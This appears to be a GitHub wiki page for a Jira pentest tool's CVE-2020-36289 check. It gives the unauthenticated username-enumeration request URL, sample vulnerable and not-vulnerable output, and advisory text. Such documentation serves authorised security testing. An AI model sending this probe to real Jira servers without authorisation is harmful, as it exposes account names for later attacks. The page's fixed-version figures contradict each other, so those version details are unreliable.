CVE‐2020‐36289 - carnal0wnage/J-PWN GitHub Wiki
CVE-2020-36289
Category: [Username Enumeration]
module name: check_cve_2020_36289
url: secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
INFO: Checking for CVE-2020-36289 (Username Enumeration via QueryComponentRendererValue)
- Not Vulnerable: HTTP 401 Unauthorized onhttp://JIRA/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
INFO: Checking for CVE-2020-36289 (Username Enumeration via QueryComponentRendererValue)
- No CVE-2020-36289 vulnerability detected on https://JIRA/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin: Empty Response ({})
INFO: Checking for CVE-2020-36289 (Username Enumeration via QueryComponentRendererValue)
[+] Vulnerable to CVE-2020-36289
URL: http://JIRA/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
Response Details:
Assignee:
- Name: 经办人
- View HTML (First 50 chars): <div class="searcherValue">
- Edit HTML (First 50 chars):
<div cla...
- JQL: assignee in (admin)
- Valid Searcher: False
- Is Shown: False
Reference: https://jira.atlassian.com/browse/JRASERVER-71559
Description Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint.
This vulnerability was discovered by Mikhail Klyuchnikov of Positive Technologies.
The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
Affected versions:
- version < 8.5.15
- 8.6.0 ≤ version < 8.13.7
- 8.14.0 ≤ version < 8.17.0
Fixed versions:
- 8.5.15
- 8.13.7
- 8.17.0
Note: this issue may also affect patched Jira instances if anonymous user access is enabled. For more information, refer to Atlassian's documentation on controlling anonymous user access.
other refs: